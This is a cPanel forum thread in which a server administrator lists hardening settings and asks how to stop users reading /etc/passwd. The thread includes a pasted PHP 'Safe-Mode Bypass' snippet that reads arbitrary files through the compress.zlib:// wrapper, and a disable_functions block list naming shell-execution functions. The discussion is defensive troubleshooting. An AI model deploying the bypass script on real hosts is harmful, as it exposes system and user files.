Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Best way to secure server from symlinks?

Discussion in 'Security' started by The raw, Feb 10, 2017.

  1. The raw

    The raw Registered

    Joined:
    Feb 10, 2017
    Messages:
    4
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Albania
    cPanel Access Level:
    DataCenter Provider
    in some parts i was able to secure my server in some parts no.

    I can't find a way to block symlinks permanently from my server.
    I have a jailed apache and harden kernel, blocked php functions and still i'm able to put a symlink on host and get infos like get everything what is into /etc/passwd
    but when i turn on mod_security from user panel i can't read anymore /etc/passwd file,

    even if open_basedir is ON i will be able to read /etc/passwd file!

    is there any way to disallow clients to turn off/on mod security?!

    i tried to turn safe_mode on but that crashed everything only sites with just html/css designs wasn't effected :confused: and at others i was getting error 505,

    in old version of cpanel, my server was pretty secured but i can't secure it with latest version, (i didn't an update was a fresh install in a new server)


    Thank you!

    As for info
    Code:
    [root@node1 ~]# cat /etc/redhat-release
    CentOS release 6.8 (Final)
    [root@node1 ~]# cat /var/cpanel/envtype
    standard
    [root@node1 ~]# uname -r
    2.6.32-642.13.1.199.cpanel6.x86_64
    [root@node1 ~]# php -v
    ea-php-cli Copyright 2016 cPanel, Inc.
    PHP 5.6.30 (cgi-fcgi) (built: Jan 25 2017 04:19:44)
    Copyright (c) 1997-2016 The PHP Group
    Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies
        with the ionCube PHP Loader v4.7.5, Copyright (c) 2002-2014, by ionCube Ltd., and
        with Zend Guard Loader v3.3, Copyright (c) 1998-2014, by Zend Technologies
        with Zend OPcache v7.0.4-dev, Copyright (c) 1999-2015, by Zend Technologies
    
    Code:
    Use Cpanel Jailed by default = ON
    CGIEmail and CGIEcho = OFF
    Enable File Protect = ON
    Blank referrer safety check = ON
    Referrer safety check = ON
    EXPERIMENTAL: Jail Apache Virtual Hosts using mod_ruid2 and cPanel® jailshell. = ON
    open_basedir = ON
    
    cPanel Security Advisor SCAN LOG.
    attached as 1.

    Apache conf. for "/"
    Code:
    Symlink Protection = ON
    ExecCGI = ON
    FollowSymLinks = ON
    Includes = ON
    IncludesNOEXEC = ON
    Indexes = ON
    MultiViews = ON
    SymLinksIfOwnerMatch = ON
    
    EA4 Profile,
    Code:
    Apache 2.4
    config
    config-runtime
    mod_bwlimited
    mod_cgi
    mod_deflate
    mod_env
    mod_expires
    mod_headers
    mod_heartbeat
    mod_heartmonitor
    mod_mpm_prefork
    mod_proxy
    mod_proxy_fcgi
    mod_proxy_http
    mod_remoteip
    mod_ruid2
    mod_security2
    mod_ssl
    mod_unique_id
    mod_watchdog
    tools
    
    PHP 5.6
    libc-client
    pear
    php
    php-bcmath
    php-bz2
    php-calendar
    php-cli
    php-common
    php-curl
    php-devel
    php-enchant
    php-fileinfo
    php-fpm
    php-ftp
    php-gd
    php-gettext
    php-imap
    php-intl
    php-ioncube
    php-ldap
    php-litespeed
    php-mbstring
    php-mcrypt
    php-mysqlnd
    php-pdo
    php-pgsql
    php-posix
    php-process
    php-pspell
    php-soap
    php-sockets
    php-sourceguardian
    php-tidy
    php-xml
    php-xmlrpc
    php-zendguard
    php-zip
    runtime
    
    On php.ini file
    Code:
    disable_functions = exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,ini_set
    allow_url_fopen = Off
    allow_url_include = Off 
    
    cPanel CFS Scan.
    Score 137/144 (other stuff is about cloudlinux ssh, nameservers geographically etc.)

    cPanel Version.
    WHM 62.0 [Build 10]

    i've read doc's and i did those steps which i have wrote here, but i'm wrong somewhere or i didn't found everything to fix this problem.

    i hope some one here can tell me where i'm wrong or what did i miss! Thanks.
     

    Attached Files:

    • 1.png
      1.png
      File size:
      288.3 KB
      Views:
      5
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    38,658
    Likes Received:
    1,427
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello,

    It looks like this system is configured to use the Bluehost patch, however it's not required because you already use the cPanel hardened kernel for symlink protection at the kernel level. You should select Off for the Symlink Protection option in the Global Configuration section of WHM's Apache Configuration interface (Home >> Service Configuration >> Apache Configuration). This will correct the symlink warning message you see in "WHM >> Security Advisor".

    Regarding the ability to view the /etc/passwd data, could you let us know the specific steps you are taking to reproduce that behavior?

    Thank you.
     
  3. The raw

    The raw Registered

    Joined:
    Feb 10, 2017
    Messages:
    4
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Albania
    cPanel Access Level:
    DataCenter Provider
    sure there's a part of code which can read it
    Code:
    <style>
    body {
        background-color: lightblue;
    }
    </style>
    <tr>
      <td width="50%" height="83" valign="top"><center>
        <div align="center">Php Safe-Mode Bypass (Read Files)
        </div><br>
        <form action="<?php echo $surl; ?>">
          <div align="center">
          File: <input type="text" name="file" method="get"> <input type="submit" value="Read File"><br><br> eg: /etc/passwd<br>
    
          <?
        
          function rsg_read()
        {  
        $test="";
        $temp=tempnam($test, "cx");
        $file=$_GET['file'];  
        $get=htmlspecialchars($file);
        echo "<br>Trying To Get File <font color=#000099><b>$get</b></font><br>";
        if(copy("compress.zlib://".$file, $temp)){
        $fichier = fopen($temp, "r");
        $action = fread($fichier, filesize($temp));
        fclose($fichier);
        $source=htmlspecialchars($action);
        echo "<div class=\"shell\"><b>Start $get</b><br><br><font color=\"white\">$source</font><br><b><br>Fin <font color=#000099>$get</font></b>";
        unlink($temp);
        } else {
        die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
        <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
        access.</CENTER></FONT>");
                }
        echo "</div>";
        }
      
        if(isset($_GET['file']))
    {
    rsg_read();
    }
      
        ?>
      
    
              <br>
          </div>
        </form>
        </td>
    </tr>
    
    script isn't created by me so i don't know too much about it!
     
  4. The raw

    The raw Registered

    Joined:
    Feb 10, 2017
    Messages:
    4
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Albania
    cPanel Access Level:
    DataCenter Provider
    as for now i found a fix for this,
    i add "fopen" on disabled func's, i don't know if this will make any problem in websites, but nothing reported for now :/
     
    cPanelMichael likes this.
Loading...

Share This Page